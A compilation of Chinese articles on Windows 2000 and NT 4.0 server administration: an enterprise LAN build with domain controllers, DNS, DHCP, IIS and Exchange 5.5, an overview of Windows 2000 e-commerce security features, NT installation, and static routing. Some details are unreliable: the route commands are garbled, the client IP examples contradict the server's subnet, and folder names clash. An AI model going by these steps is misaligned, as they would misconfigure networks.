以上算是开头，以后一点点增加，实在是现在还有很多事情等着去做，不好意思了　：－）


WINDOWS2000作企业内部网服务器详解

《一键清理系统垃圾》

WINDOWS2000作企业内部网服务器详解

     随着计算机的不断普及，计算机网络化成为越来越紧迫的问题，大多数企事业单位的网络多为一百点左右的星型局域网，一般没有专业的网络管理人员，服务器软件的安装及权限设置的优劣直接关系到网络的安全与稳定。下面以中国石化集团武汉石油化工厂设计院（下称设计院）的局域网为例，简要介绍一下服务器软件安装与权限设置。
    设计院局域网共有153个信息点，实际使用86点，4台3COM3C16980100M交换机两两堆叠，中间用级连。选用惠普LH3服务器2台，其中一台采用双CPU，512M内存，4块9.1GSCSI硬盘（命名为Server1），另一台单CPU，256M内存，一块9.1GSCSI硬盘（命名为Server2）。Server1上存放设计人员的个人文件及设计院内部主页，Server2上安装微软的Exchange5.5及SQLServer7.0（因为SQLServer7.0只用于建立内部的图纸档案管理系统，在此不作讨论）。整个网络使用TCP/IP协议，启用192.168.0.0C类网址，子网掩码为：255.255.255.0。192.168.0.31-192.168.0.50给内部Web、FTP及其他站点的使用；192.168.0.51-192.168.0.200用于客户机IP地址；192.168.0.241-192.168.0.254用于交换机管理。

    两台服务器都安装Windows2000Server版，要求达到以下的功能 1.每个设计人员在服务器上都拥有50M的个人空间，且不得超额使用，个别特殊情况可以申请额外空间。 2.建立内部主页，各个专业室负责维护各自的内容。 3.建立内部新闻讨论组。 4.建立内部邮件系统。 5.整个系统应安全可靠，当一台服务器失效时，应能保证整个网络仍然可用。

    下面介绍服务器软件的安装及权限设置，以达到以上的目的。

    一、网络操作系统的安装

    1.在Server1及Server2上按照典型安装安装Windows2000（Server2上不安装IIS），服务器的所有磁盘分区都转化为NTFS格式。

    2.在Server1上，开始//设置//控制面板//网络和拨号连接//本地连接//属性àInternet协议（TCP/IP）//属性，将IP地址设为192.168.0.1，子网掩码为255.255.255.0à高级，添加以下IP地址：192.168.0.31，192.168.0.32，192.168.0.33。将Server2的IP地址设为192.168.0.2，在Server2上添加以下IP地址：192.168.0.41。

    3.在Server1上，开始//程序//管理工具//配置服务器//ActiveDirectory，升级为域控制器，新建Windows2000域（因为局域网中没有Windows NT4.0的域控制器，所以不用兼容方式），域名为design.local，NetBIOS域名为：武汉石化设计院（Windows9.x登录时的域名），系统会自动安装DNS服务。

    4.将Server2也升级为域控制器，加入到design.local中,系统会自动复制域控制信息到Server2。

    5.开始//设置//控制面板//添加/删程序//添加/删除Windows组件//网络服务，在Server1及Server2上安装DHCP，WINS服务，在Server2上安装DNS服务。

    6.在Server1上，开始//程序//管理工具//WINSàServer1//右击复制伙伴//新建复制伙伴//选择Server2。同样，在Server2上选择Server1为复制伙伴，建立相互复制关系。

    7.在Server1上，开始//程序//管理工具//DNS//Server1//正向搜索区域//右击design.localà新建主机，加入如下的主机： WWW192.168.0.31 FTP192.168.0.32　　　　　　　 news192.168.0.33 mail192.168.0.41

    8.在Server1上，开始//程序//管理工具//DHCP//右击Server1//新建作用域，IP地址为192.168.0.51-192.168.0.150，加入DNS、WINS（DNS和WINS的IP地址都为（192.168.0.1，192.168.0.2）及节点类型（使用H节点）的配置。在Server2上建立辅作用域，IP地址为192.168.0.151-192.168.0.200，也加入相同的DNS、WINS及节点类型的配置。

    9.采用步骤2的方法，在Server1及Server2上添加DNS的IP地址192.168.0.1（主），192.168.0.2（辅） 注意：按照以上的系统安装方法，当任意一台服务器失效时，网络照样能够实现帐号登录、DNS解析，IP地址的动态分配及WINS服务，确保了网络的可靠性。

    10.Server1主要当作文件服务器使用，一个硬盘用于安装系统（C盘），其他三个做RAID5（D盘），用于存放设计人员的个人文件及设计院内部主页。在资源管理器中右击C盘à属性à安全à添加Administrator组，授予完全控制的NTFS权限，将其他的组或帐号删除，D盘也如此，Server2也如此。这样即使有些用户可以进入机房并登录上服务器，但是有限的权限不会造成服务器上数据的破坏。

    11.在Server1的D盘上建立名为"用户个人文件夹"的文件夹，右击属性à共享à权限，选择Everyone组有完全控制的共享权限à安全，添加Everyone组在此目录下有读、列目录的NTFS权限。

    12.在资源管理器中右击D盘//属性//配额//启用配额管理//拒绝将磁盘空间给超过配额限制的用户//设置限制空间为50M，报警空间为45M，超出配额限制时记录事件。若要对个别帐号调整限制空间，请点击配额项。

    13.打开ActiveDirectory用户和计算机，按专业室建立组织单元，如工艺室，设备室等，再建立名为"网络管理"的组织单元，用于局域网的管理。在"网络管理"组织单元中建立网管帐号，将其加入到Administrator本地组中。

    14.组织单元中先建立样板帐号，右击样板帐号//属性//配置文件//主文件//连接，输入\\server1\用户个人文件夹\%username%。复制样板帐号，这时仅需更改帐号名及初始的口令。系统自动地在Server1的用户个人文件夹目录下建立以用户帐号命名的文件夹。NTFS权限也自动设置为Administrator及此用户有完全控制权限。

    二、IIS5.0的安装及配置

     1.Web站点的建立 l在Server1的D盘根上建立名为hompage的文件夹，将主页的所有文件拷入此文件夹（主页的首页文件更名为Default.htm）。开始//程序//管理工具//Internet服务器管理//右击Server1//新建//Web站点//输入主页名称//将Web地址指向192.168.0.31（即WWW主机）//输入主目录的路径为d:\homepageà以下选择默认选项即可。 在资源管理器中右击d:\homepage//属性//安全//添加IUSR_SERVER1帐号，授予读、列目录、运行的NTFS权限。

     2.FTP站点的建立 建立FTP站点的目的主要是用于Web主页的修改。为每一个专业室在d:\homepage下建一个文件夹，用于存放各自的文件，在设计院内部主页上指向它们即可。
     1)开始//程序//管理工具//Internet服务器管理//右击Server1//新建//FTP站点//输入FTP站点名称//将FTP地址指向192.168.0.32（即FTP主机）//输入主目录的路径为d:\homepage//允许读取及写入。
     2)在Internet服务器管理中，打开刚才建好的FTP站点的属性，在安全帐号选项卡中，勾去允许匿名连接，不允许匿名登录。
     3)用ActiveDirectory用户和计算机在"网络管理"这个组织单元中新建一个名为"Web管理组"的全局安全组，将需要Web站点管理的用户帐号加入。
     4)在资源管理器中，右击d:\homepage//属性//安全//添加Web管理组，授予读及列目录的权限。其子目录下的每个专业室的文件夹照此方法分别给相关帐号授予读、列目录、运行、写、修改的NTFS权限。
     5)开始//程序//管理工具//域控制器安全策略//安全设置//本地策略//用户权力指派，在关闭系统及在本地登录两策略中加入Web管理组。

    3.新闻讨论组的建立
     1)用资源管理器在Server1的D盘上建立newsys及news两个文件夹
     2)开始//程序//管理工具//Internet服务器管理//右击Server1//新建//NNTP虚拟服务器//输入NNTP站点名称//将NNTP地址指向192.168.0.33（即news主机），TCP端口为119//输入新闻组服务器内部文件存放路径为d:\newsysà选文件系统//输入新闻内容存放路径为d:\news，启动新闻组。
     3)在Internet服务器管理中，点击刚才建立的新闻组//右击新闻组//新建//新闻组，输入相关信息即可。注意，新闻组的名称不可为汉字。
     4)打开资源管理器，可以发现在news文件夹中多了个文件夹，这就是我们刚才新建的新闻组，对其设置相应的NTFS权限（主要是写权）就可以做到允许某些账户张贴帖子，某些账户只读。

    三、内部邮件系统的建立

    1.使用典型安装在Server2上安装微软的Exchange5.5。

    2.开始//程序//ExchangeServer//ExchangeServer管理工具，在接收器中建立邮箱，与相应的NT帐号对应。在接收器中还可以建立不同的分发组（如工艺室），将相应的邮箱放入，这样当您需要给工艺室所有人发信时，就只需给分发组发封信即可。

    3.在客户机上安装MicrosoftOffice97中的MicrosoftOutlook97。开始//设置//控制面板//电子邮件//添加àMicrosoft ExchangeServer，在服务器项中输入Server2，邮箱中输入相应的邮箱名。

    四、Windows9.x客户机安装注意事项

    1.Windows2000采用了ActiveDirectory技术，因此必须在Windows9.x安装ActiveDirectory客户机补丁。对于某些安装Win98第二版的计算机，打了补丁后，很长时间后甚至根本无法在网上邻居中看到Windows 2000服务器，而Win98第一版这不存在此问题，其中的缘由还望各位高手不吝赐教。

     2.新闻组的接受可使用Windows自带的OutlookExpress，从安全性的角度考虑，最好使用安全密码验证登录。注意：客户机中这时有两个Outlook，如果Exchange Server安装Internet协议，则可以不安装MicrosoftOutlook97。但是从功能，可扩展性及安全性角度考虑，我个人认为还是这样好。

返回


Windows 2000服务器家族--卓越的电子商务平台

《一键清理系统垃圾》

Windows 2000服务器家族--卓越的电子商务平台

当前的电子商务模式，比较流行的有Business to Business(B to B)和Business to Customer(B to C)两种。这两种模式各有特点，所以在实现时对操作系统和开发方法的要求有所不同，但是Windows 2000服务器家族所具备的高性能、高可靠性、可伸缩性，以及集成在Windows 2000中的丰富的功能，为快速、可靠地建立功能强大的B to B和B to C电子商务系统提供了卓越的服务器平台。本文将介绍Windows 2000服务器家族对建立电子商务应用的支持。

支持电子商务的特性和服务

Internet Information Server 5.0

绝大多数的电子商务系统，是建立在WWW的基础上的。Windows 2000服务器中内置了一个新的Web服务器--Internet Information Server(IIS) 5.0。在Windows NT 4.0的平台上，4.0版本的IIS以其强大的服务能力和丰富的开发手段，使其成为了电子商务的主要服务器平台。现在IIS 5.0在原有的基础上，又增加了许多新的功能。

IIS 5.0将运行在它上面的Web站点应用和IIS核心服务隔离开来，而且可以对每个站点应用配置独立的CPU使用率，并可以独立停止和重起每个进程。这大大提高了Web服务器的可靠性和稳定性，是您建立的电子商务站点运行的更加可靠。

在安全性方面，IIS 5.0可以使用Windows 2000 Active Directory实现用户身份的验证，也可以使用证书和Active Directory的结合来验证用户。这为电子商务系统提供了即灵活又可靠的对用户身份的确认。

IIS 5.0上的Web站点的开发使用的时Active Server Page (ASP) 3.0。ASP提供了强大的功能和与Windows的紧密集成，同时ASP 3.0又进一步提高了效率。ASP 3.0提供了和XML的集成，同时也可以用ADSI 2.0对Windows 2000 Active Directory进行操作。使用Microsoft Visual InterDev 6.0开发工具，您可以快速建立您的电子商务系统，也可以建立一个复杂但是功能强劲的电子商务系统。

7×24小时不停顿服务

对于一些关键性的电子商务站点，能否提供不停顿的服务是一个重要的条件。Windows 2000 Advance Server的Windows群集服务可以使用两台服务器建立2个节点的群集，而Windows 2000 Datacenter Server则可以建立4个节点的群集。群集的建立使得在某台服务器出现故障时，其他服务器可以接管他的工作，保证系统的运行。
Windows群集服务的另一个功能是能够为Web服务器建立32个节点的网络流量平衡的群集，也就是最多可以同时有32台服务器作为同一个Web站点提供服务而不需要额外的硬件设备。这个功能可以用于建立为大量用户同时提供服务的大型电子商务站点。

网络连接支持

在Windows 2000中，TCP/IP是作为唯一的缺省网络协议来安装的。Windows 2000中的TCP/IP是符合Internet标准的，可以和任何支持TCP/IP的计算机通讯。在Windows 2000中，TCP/IP的实现经过了仔细的优化，可以提供优越的网络通讯性能。

Windows 2000的TCP/IP增加了IPSec，可以自动为两台计算机之间的数据传递进行加密，为电子商务提供更好的安全性。

在Intranet/Extranet的方式中，电子商务的用户可能系统使用虚拟私有网(VPN)以提供更强的数据安全性。

Windows 2000的路由和远程访问服务同时提供了拨号用户接入和VPN的功能。

Windows 2000同时提供了PPTP和L2TP两种VPN方式。

Windows 2000还提供了对ATM的支持，为将来高带宽的网络连接做好了准备。

证书服务

Windows 2000的公共密钥基础结构(PKI)使用符合X..509标准的证书。通过Active Directory，Windows 2000可以将证书用于数据加密、用户身份验证、智能卡登录、加密文件系统等。

证书服务是Windows 2000的CA。证书服务可以为Windows 2000网络用户颁发证书，也可以通过IIS为其他用户颁发证书。Windows 2000的证书服务器可以建立树形结构，由根CA向分支CA提供CA证书，然后分支CA在向用户颁发证书。

Windows 2000上的电子商务系统既可以使用Windows 2000的证书服务，也可以使用其它第三方CA提供的证书。

电子商务系统开发

Windows 2000的分布式开发结构，为开发大型的电子商务站点提供了基础。内置的MS DTC服务和Message Queuing服务，可以用于开发分布式的应用。新的ADO 2.5为访问各种不同类型的数据库提供了统一的接口。通过在ASP中使用ADO，不但可以访问关系型的数据库，如Microsoft SQL Server和Oracle Server，还可以访问Exchange Server的数据库和Active Directory的目录数据库。

Windows 2000不但本身具备了多种能力，而且还是一个优秀的应用服务器操作系统。在Windows 2000上运行的其他Microsoft服务器产品和第三方产品，也为建立电子商务系统提供了各种条件。Microsoft Site Server 3.0 Commerce Edition是专门用于建立电子商务系统的服务器软件。Site Server 3.0 Commerce Edition运行在Windows 2000上，可以使用它的向导工具快速建立一个电子商务站点，也可以使用它提供的对象开发一个功能强大的站点。

电子商务的安全性

在电子商务系统的实现中，安全问题一直是最受到关注的问题。因为电子商务系统的运行经常涉及到非常敏感或非常有价值的数据，所以任何在安全问题上的漏洞都可能造成巨大的损失。
在计算机环境的安全性问题上，主要有三个需要解决的问题：

l 用户身份的识别 首先需要保证正在使用系统的人就是你所授权可以使用系统的那个人，必须有方法防止有人冒名顶替或欺骗

l 数据存储的安全 要有完整的安全策略来保护敏感的数据，只有得到特定授权的人才可以对数据进行指定的操作

l 数据传递的安全 电子商务的数据肯定需要在网络上传输，必须防止有人偷听和非法修改在网络上传递的数据，必须对数据进行加密
同时，好的安全系统还要求为设置和维护安全性提供简单而有效的方法。在Windows 2000服务器家族中，提供了一系列的内置的安全特性和服务，来实现网络系统的安全性和对电子商务的支持。

Public Key Infrastructure (PKI)

公钥基础结构（PKI）是Windows 2000系统的分布式安全性的基础。公共密钥系统使用的是一对密钥，其中一个是用户的私有密钥，由用户保存在安全的地方；另一个是用户的公共密钥，公开给其他人。使用用户的公钥加密的数据，必须用用户的私钥才能解开。在Windows 2000环境中，公共密钥系统可以用于Web用户身份验证、Web服务器身份验证、安全电子邮件、IPSec、代码签名、加密文件系统等。

发布公钥使用的公钥证书，通常简称为"证书"。证书是包含了证书的所有者、公钥、有效期、颁发者和其他信息的一个数据结构。现在使用的证书多数是基于X.509标准，Windows 2000的PKI也是使用这个标准。在Windows 2000中，证书的颁发和管理可以使用内置的证书服务（Certificate Service），也可以使用第三方颁发的证书。

用户身份验证

Active Directory是Windows 2000中的目录服务，也是Windows 2000最核心的服务之一。

在Windows 2000的网络环境中，Active Directory的最主要的功能就是实现用户身份的验证。Windows 2000的用户身份验证使用的是Kerberos V5协议，这种验证方法最大的好处是可以实现单一注册，也就是允许用户通过在网络中的一个地方的一次登录就可以使用网络上他可以获得的所有资源。对于非Windows 2000的用户，也可以使用原来的NTLM的身份验证方式。

在身份验证时，用户需要提供他的有效的用户名和口令。但是作为对这种传统的身份验证的增强，在Windows 2000中还可以使用智能卡进行身份验证。在智能卡中存放了用户的个人信息和他的私钥，用户登录时必须在读卡机中插入他的智能卡，同时输入对应的个人识别码（PIN），才能通过身份验证。

相对于口令验证，智能卡有更强的安全性。因为口令比较容易被不怀好意的人得到，被猜测到的可能性也较大。而智能卡就像一把无法复制的钥匙，只有拿在手里才能打开大门。用智能卡进行身份验证需要Windows 2000 PKI的支持。

对于用户身份验证的管理，Active Directory还提供的进一步的配置。在Active Directory中设置了一系列的安全模板，可以方便的配置特定的Windows 2000系统的安全性。在安全模板中，详细地设定了各方面的安全配置，包括用户账户、用户操作的审核、各类事件的记录、对系统服务的配置，对注册表和文件系统的安全管理。

在电子商务系统中，某些情况下无法通过Active Directory实现用户身份的验证，例如用户是通过Internet而不是Intranet访问电子商务系统。一般情况下用户使用的由证书颁发机构颁发给他的证书来递交身份的验证。此时Active Directory允许将指定的证书映射到对应的用户账户，也可以将多个证书指定的一个用户账户。这样通过Internet访问的用户也具有了Active Directory验证的身份，同时具有对各种对资源访问的权力。

用户所拥有和使用的证书，可以是由Windows 2000内置的证书服务Certificate Service颁发，也可以是由其他受信任的证书颁发机构颁发的证书。

数据存储的安全性

在Windows 2000系统中，数据存储在NTFS 5.0格式的分区或卷中。在NTFS的文件系统中，每个文件和文件夹都有相应的用户访问控制列表(Access Control List)。任何一个通过了身份验证的用户，如果需要访问一个文件，必须是在这个文件的访问控制列表中已经有了相应的赋予这个用户的许可。对于没有获得许可的用户，Windows 2000将禁止他对这个文件的操作。在NTFS 5.0文件系统中，对访问控制的配置是可继承的，也就是在上一级文件夹上配置的访问控制可以一直向下作用到它包含的文件和子文件夹中。这个功能可以使文件系统的安全配置更加简单。

在Windows 2000中，还可以配置对指定文件的审核。审核可以让管理员看到有哪些用户对这个文件进行了什么样的操作。对于一些关键的文件，审核可以增加系统的安全性。

NTFS文件系统提供了用户对文件访问的控制，但是存放在物理设备（硬盘等）上的数据是没有加密的。所以仍然存在可能绕过Windows 2000操作系统而直接访问物理设备上的数据，从而造成泄密。对于这种情况，Windows 2000提供了加密文件系统(EFS)。加密文件系统也是使用了PKI，存放在物理设备上的数据都是经过加密的数据，只有文件的所有者（用户）才能使用这些文件。数据的加密和解密需要用户的公钥和私钥，但是整个过程对用户来讲是透明的，用户感觉不到数据的加解密处理。

数据传输的安全性

对于电子商务来讲，数据在公共网络上的传输是不可避免的。于是数据在传输过程中就很可能被被窃听、拦截和欺骗。要保证数据传输的安全，必须对传输中的数据进行加密。

当我们用IIS 5.0作为电子商务的Web服务器平台，用Internet Explorer来连接到这个站点时，为了获得安全性，可以使用Web服务器的安全套接字层（Security Sockets Layer, SSL）。SSL在Web浏览器（IE）和Web服务器（IIS）之间建立安全（https://）的通信连接，使用公共密钥技术对通信的数据进行加密。默认情况下加密使用40位长度的密钥，受到密钥出口长度的限制，在中国不能使用128位长度的密钥。但是IIS 4.0中增加了服务器网关加密（SGC），可以使用128位的密钥专门为金融机构提供全球范围的安全数据传递。

数据加密传输的另一种方法是可以使用虚拟私有网（VPN）。VPN可以在公共的网络（Internet）上建立一个安全的数据传输隧道，这样用户在使用公共网络时就可以象使用自己的内部网络一样。Windows 2000支持的VPN方式为点对点隧道协议（PPTP）和第二层隧道协议（L2TP）。其中PPTP使用Microsoft点对点加密（MPPE）方式对数据进行加密，而L2TP则使用IPSec。IPSec直接对IP包进行加密，还可以用于在两台计算机之间的直接的数据加密传输。在某些基于Intranet/Extranet形式的电子商务系统中，经常会采用某种形式的VPN让远程的用户连接到内部网络

返回


Windows NT服务器及工作站的安装

《一键清理系统垃圾》

Windows NT服务器及工作站的安装

     （一）安装Windows NT Server 4.0
     1、 Windows NT Server 4.0基本要求
     CPU：Intel 32位x86微处理器，至少是80486/25
     RAM：建议至少安装12M的RAM
     显示卡：VGA、SVGA或更高分辩率的图形显示卡
     硬盘：一个或多个硬盘，至少预留125M的可用空间
     软盘驱动器：必须配备一台高密度3.5英寸软驱
     2、 安装前的注意事项
     a)从Windows 95“升级”到NT
     Windows 95无法升级到Windows NT Server 4.0，所以须将Windows NT Server 4.0安装到另一个新建的目录中，并且Win95中的应用程序也必须在NT中重新安装。
     b)MS-DOS（Win95）、Windows NT双启动
     要实现MS-DOS(Win95)与NT双启动，则必须先安装MS-DOS再安装NT。如果先安装NT再装MS-DOS，则可能覆盖掉启动区而造成NT无法启动。
     3、安装Windows NT Server 4.0
     我们讲述的Windows NT Server 4.0安装是指将NT Server 4.0的系统文件首先复制到FAT格式的DOS硬盘C：中，然后从C：\i386子目录下安装。
     a)首先在DOS状态下运行WINNT.EXE/B（WINNT32.EXE是在升级NT时用的），这样可以不需要制作三张安装磁盘，以节省时间。
     b)指定你的系统文件所在的目录，此为c:\i386,确定之后，将会花很长的时间复制文件到你的系统盘上，复制完成后按Enter，重新启动。
     c)将会出现MS-DOS Windows NT 4.00 Installation/Upgrade两项选择，选后一项接着进行。
     d)自动检测大容量设备可自动检测SCSI卡、IDE卡、CD-ROM等在容量设备，按Enter键自动检测。
     e)Windows NT许可协议“Windows NT许可协议”画面出现以后，按Page Down键阅读许可协议的所有内容。同意此协议按F8。
     f)升级中或安装新的Windows NT选取“取消升级并安装新的Windows NT”，按N
     g)硬件环境的设置
     #计算机的种类
     #显示器的种类
     #键盘的种类
     #键盘布局
     #鼠标的种类等
     你不必更改这些设置，直接按Enter继续。
     h)设置硬盘分区
     这里需要特别介绍一下NTFS和FAT文件系统（NTFS是指Windows NT文件系统，FAT是指DOS的文件分配表）：NT可以安装到这两种文件系统中。使用FAT的好处在于它是DOS所使用的文件系统，DOS、Windows 95启动时可以访问该分区的内容，而当DOS、Windows95启动后却无法读取NTFS文件系统的数据，因此，当你的服务器同时存在DOS、Windows 95时，NT Server可采用FAT文件系统。但NTFS系统却具有很多优越性，其支持容错、硬盘目录与文件的压缩功能、Unicode，还支持目录与文件的权限设置（而FAT只能设置共享目录权限），当发生断电或其它问题时，它可以还原磁盘的内容。不过，NTFS分区至少需要400MB的磁盘空间，否则影响效率，所以应根据你的需要来确定。如果是专用服务器，建选用NTFS文件系统。
     I)选择放置NT文件的目录
     Windows NT Server 4.0中文版缺省在\WINNT子目录中，但你可以改变。
     这里我们仍以\WINNT目录为例接着说明。下面的步骤，安装程序将对硬盘进行检测。有两种选择，“对硬盘进行彻底检查”按Enter键，“略过”按Esc。接下来开始将文件复制到硬盘中，完成后请根据屏幕提示重新启动计算机，系统重新启动后，会出现你系统Windows NT版本信息，CPU个数及内存容量，启动完成后Windows NT安装向导将邦助你完成以下的工作。因为以下的工作都是在安装向导指引下进行的，所以我们不打算作过多的介绍，只是提醒一下几个值得注意的事项。
     第一：选择许可协议方式，有两种可选：“每服务器”和“每客户”。因为是小型NT网应用，一台服务器的情况下一般选择“每服务器”方式；如果是大型应用，有多台NT服务器，而每个客户端都可以访问每台NT服务器，则选择“每客户”方式有利。具体的方法根据全部服务器的“客户许可协议”的总数与网上计算机数目的总数比较来确定，如前者多于后者，选择每客户，否则选择每服务器方式。如果事先不能确定选择何种方式，可以先确定“每服务器”方式，今后可以合法地、单向地更改为“每客户”方式。所谓单向，是指只能从“每服务器”改为“每客户”，并且只能修改一次。
     第二：选择网络协议，可选TCP/IP，NWLink，NetBEUI。如果要连上国际互联网或与其它如UNIX网联接，可选用TCP/IP协议；如要与NetWare网一起使用，可选NWLink协议，该协议与NetWare IPX/SPX兼容；如果我们的网络规模较小，选用NetBEUI协议可获得较高的通信效率。
     第三：设置管理员的帐号时，NT Server的系统管理员为“administrator”，不要与NetWare的系统管理员名称“supervisor”混淆，设置完密码后请务必牢记，今后进入系统时会用到。
     第四：建议选择制作紧急修复盘，便于以后出现故障时使用。
     第五：TCP/IP协议设置如IP地址可设：192.1.1.1,子网掩码可设：255.255.255.0。
     其它的一些设置项如TCP/IP的设置，主域、备份域控制器的设置等请参阅相关书籍，在此不作一一叙述。这样安装完成之后，重新启动，选“Windows NT Server Version 4.00”项进入启动，如果不成功，选 Windows NT Server Version 4.00 [VGA mode]正常启动。
     出现登录画面时，按Ctrl+Alt+Del三个组合键，然后输入前述步骤中设置的密码，经密码审核正确后，你将会看到类似Windows 95的画面出现，其操作方式与Windows 95几乎同出辙，这样Windows NT Server 4.00就算安装结束了。安装完成后还应该为你的用户设置帐号、密码、所属组及网上共享资源等，供你的用户登录服务器时使用。

(二)从工作站登录到Windows NT

     从工作站登录到Windows NT有好几种方式，我们这里主要介绍从Windows 95中文版工作站登录到Windows NT的情况，下面详述之。
     1、 安装网卡
     a) 选择“开始\设置\控制面板\网络”图标，出“网络”对话框后单击“添加(A)…”按钮。
     b) 将出现另一对话框，选列表框中的“适配器”，按“添加(A)…”，根据你的网卡适配器选择相应厂商的适配器，按“确定”钮将回到网络对话框中，选刚才添加的适配器，按属性钮，出现属性对话框，此处可调整网卡中断及I/O地址。
     2、 设置登录NT
     a) 单击“添加(A)…”，选择列表框中的“客户”一项，单击“添加(A)…”，选“Microsoft”厂商“Microsoft网络客户”，确定。选“Microsoft网络客户”，单击“属性”，选“登录到Windows NT域（L）”并输入NT Server安装时确定的“Windows NT域（W）”名称，按确定。
     3、设置网络通信协议
     选定“协议”，单击“添加”，出现“选定网络协议”对话框，选“Microsoft”厂商“IPX/SPX兼容协议”——“NetBEUI”并确定，这样则不需要过多地设置。如选TCP/IP，则与服务器对应，可设置为IP地址：192.1.1.2,子网掩码：255.255.255.0，其余工作站IP地址设为199.168.1.1，199.138.1.2，199.168.1.3……等依次类推，最多为199.168.1.255，而子网掩码均为：255.255.255.0。而详细说明则需参见相关书籍，在此不作敖述。这几项设置完成之后需重新启动。
     4、根据你在NT Server中设定的用户帐号、密码及域名，正确填入Windows 95登录到NT Server的对话框，登录正常后则可以共享服务器端的资源了。

返回


Windows NT服务器用作路由器

《一键清理系统垃圾》

Windows NT服务器用作路由器

    网络技术发展到今天，已不再局限在一个小的LAN中了。在日常组网中，碰到最多的就是将现有的网络互联起来，实现最大限度的资源共享、信息互通。将不同的网络互联，第一个碰到的问题就是采用什么样的协议。TCP／IP发展到目前为止，已成为一个最为广泛使用的网络通用协议。被广大计算机使用者所认可。采用TCP／IP，可以方便地进行不同网络种类、不同操作系统的网络间的互联，同时又可以方便地联入Internet。
    在TCP／IP网络互联中，不同网络的互联往往要使用到路由器。传统的基于硬件的路由器价格往往较高，不为一般的单位所接受，而且在联网过程中，常碰到的问题都是将两个或两个以的的局域网互联，也用不着使用昂贵的专用路由器。实际上，有好多网络操作系统本身就提供路由功能，只不过是基于软件的路由而已，如Windows NT的静态路由系统、NOVELL的多协议路由MPR等基于软件的路由技术。
    基于软件的路由，功能上肯定不如基于硬件的专用路由器。但它已具备了路由器的基本功能。可以实现基本的路由功能。采用基于软件的路由，对于小型网络间的互联是比较理想的。下面以网络间的互联为例来说明基于软件的路由技术。
    众所周知，在TCP／IP协议中，IP协议（Internet Protocol）提供编址和路由功能。在网络上发送数据时，数据首先被打包，成为一个个IP数据包。IP允许数据包在网络上从一个地方传到另一个地方。数据在网络中的传输就是通过一种方式进行的。在一个以太网内，把报文从一台机器发送到另一台机器很容易，因为以太网是一个基于广播方式的网络，任何一台机器上发出的报文立即就会被网上的所有机器监听到，只有同报文中地址相同的那台机器才会发出响应，别的机器将忽略此信息。由此可见，在同一网络内部，每一个报文都无须选择路径，就可以直接达到它的目的地。但是，在两个或两个以上的网络互联时，情况就大不一样了。如图1所示，处在网络Counter中的某一台机器要向处在网络Computer Center中的一台机器发送信息时，如果没有从网络Counter到网络Computer Center的路由，则信息是根本无法发到的。
    从上述分析可以知道：既然在同一个网络内信息可以畅通传送，那么如果有这样一台机器就好了：一台既属于网络Counter又属于网络Computer Center的机器。通过它，两个不同的网络就可以相互传递信息了。实际上，在Windows NT中，IP路由是IP具有的功能。NT允许将一台机器配制成多宿主机。也即在同一台计算机上，同时安装两块或多块网卡，每一块网卡连接一个网络。由这一台机器作为路由器，在两个网络之间进行IP包的路由。此路由为静态路由，静态路由器要求手工构造和更新路由表。
    在各网络已建成的情况下，建立NT路由器，其建立过程如下：
    1、在同一台Windows NT机器中安装两块网卡，网卡可以采用任何NT所支持的网卡。Windows NT可以是Windows NT Server也可以是Windows NT Workstation，版本最好是3．51或更高的版本。本文基于WindowsNTServer4．0中文版。
    2、进入控制面板，安装TCP／IP协议
    3、配置网卡：为每一块网卡配置一个IP地址，两个IP地址分别属于不同的网络内的IP地址。
    4、设置Windows NT的IP路由功能为Enable。
    5、确定后重新启动计算机。
    这样，NT路由器就可以在两网络间进行工作了。
    网络结构如图1所示：
    NT路由器工作过程如下：
    处在Counter网络中的某一台计算机Counter01，要给处在Computer Center网络中的某一台计算机CC01发送信息。它通过广播方式查询CC01是否同自己在同一个网络内，如果在同一网内，则信息包由Counter1传至CC01，IP包在同一网络中传送。如果通过查询，发现CC01不在同一网络内，发出点Counter1发现自己根本不知道如何到达CC01，在这种情况下，信息包被送至缺省网关：ROUTER1（在组网时，必须事先将网络Counter中的每一台机器的缺省路由器设为ROUTER1，IP地址为ROUTER1的IP地址。对于网络内的每一台机器而言，缺省路由器实际上就是这样的一个机器，如果发出信息点找不到目的地址时，它就将信息发给缺省路由器，之后由路由器为它代理发送），ROUTER1接到信息后，由在它上运行的IP软件对信息进行检查，通过检查包内容，可以确定IP包中的源地址和目标地址，如果发现IP包中的源IP地址同第一块网卡的IP地址处在同一网络内，目标IP地址同第二块网卡在同一网络内，它就将信息通过它的第二块网卡发送出去，这样信息便传至网络Computer Center中。信息包一旦进入网络Computer Center，处在该网络中的目的计算机监听到信息包是送给自己的，于是它便接收信息包，将它们重组。
    以上是NT路由器在两个网络内工作的情况，它的确可以很好地胜任它的任务，但是如果有三个或三个以上的网络，上面所提到的方法就不能胜任了。
    请看以下的网络结构：
    ROUTER1路由器只能把消息192．168．101传到网络168．168，但不能将信息从网络192．168．101传至网络Admin（195．125．96）。不过不要紧，NT中的Route命令可以告诉路由器如何到达AdminCenter，对ROUTER1及ROUTER2来说，它们都同时属于Computer Center这一网络，因此要使路由器能够通过ComputerCenter网络（193．169．101）发到AdminCenter网络（195．125．96），只要告诉ROUNTER1网络Computer Center中ROUTER2的网卡地址即可。
    命令格式如下：
    C：ιWinntΛrouteadd195．125．96168．168．100．100
    这一命令将向ROUTER1的路由表中添加路由信息，其意为：把任何目的为195．125．96．xxx的IP包发到168．168．100．100上。
    同样，对于网络AdminCenter，路由器ROUTER2也不知道如何到达Counter网络（192．168．101），也要告诉它如何到达。
    命令格式如下：
    C：ιWinntΛrouteadd192．168．101168．168．100．101
  功能同上。
    实际上，我们可以通过建立静态路由表来实现以上功能，在ROUTER1、ROUTER2上建立静态路由表，静态路由表要求有一个目标和一个网关，目标是目标网络的网络ID或网络名，网关是与目标网络相连的IP地址或宿主机名字。其内容如下：
    对于ROUTER1，要用网络Admin的网络ID及其缺省网关的IP地址来构造路由表。网关是与目标网络相连的计算机的IP地址或宿主机名。其静态路由表如下：
    目标网络网关
    195．125．96168．168．100．100
    AdminROUTER2
    对于ROUTER2，要用网络Counter的网络ID及其缺省网关的IP地址来构造路由表。网关是与目标网络相连的计算机的IP地址或宿主机名。
    其静态路由表如下：
    目标网络网关
    192．168．101168．168．100．101
    CounterROUTER1
相应的NETWORKS文件内容如下：
＃WindowsNT4．0NetworksContent
    Counter192．168．101
    Admin195．125．96
    Loopback127
    ……………
    ComputerCenter168．168
    对应的HOSTS文件内容如下：
    192．168．101．1COUNTER1counter1．saturn．com
    168．168．100．1CC01cc01．saturn．com
    …………
    ＃……
    至此，三个网络间就可以通过路由进行信息传递了。
